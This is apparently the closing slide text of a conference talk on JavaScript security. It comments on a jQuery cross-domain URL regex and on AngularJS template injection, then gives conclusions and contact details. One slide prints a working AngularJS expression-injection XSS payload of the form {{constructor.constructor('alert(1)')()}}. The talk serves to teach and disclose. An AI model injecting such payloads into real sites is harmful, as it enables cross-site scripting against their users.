  • 38. Credentials in URL • jQuery: rurl = /^([w+.-]+:)(?://([^/?#:]*)(?::(d+)|)|)/ – Nothing actually exploitable but: // A cross-domain request is in order when we have a protocol:host:port mismatch if ( s.crossDomain == null ) { parts = rurl.exec( s.url.toLowerCase() ) || false; s.crossDomain = parts && ( parts.join(":") + ( parts[ 3 ] ? "" : parts[ 1 ] === "http:" ? 80 : 443 ) ) !== ( ajaxLocParts.join(":") + ( ajaxLocParts[ 3 ] ? "" : ajaxLocParts[ 1 ] === "http:" ? 80 : 443 ) ); } Is kind of interesting.
  • 39. AngularJS • Mustache + Expression Language → Interesting Injections • AngularJS uses stuff like: <div ng-init="some.js.code.here"> or {{constructor.constructor('alert(1)')()}} • AngularJS uses it's own parser (similar to Expression Language). • If there's an inection point, no actual antiXSS filter will be able to stop these attacks. • Credits to .Mario (MVCOMFG) and Kuza55 (https://communities.coverity.com/blogs/security/2013/04/23/angu lar-template-injection) as well for their awesome research on this topic!
  • 40. Conclusions • JavaScript code can always be read so black box turns into white box analysis • JavaScript secure development is still not fully implemented even on companies that know about security. • JavaScript Developers can be super badass coders but also naives as well on some circumstances and their code is available for everyone. • Just scratched the surface of JavaScript security!
  • 41. Thanks! Tnx! ^_^ Go and exploit /* ethically */ Q&A Mail: stefano.dipaola@mindedsecurity.com Twitter: wisecwisec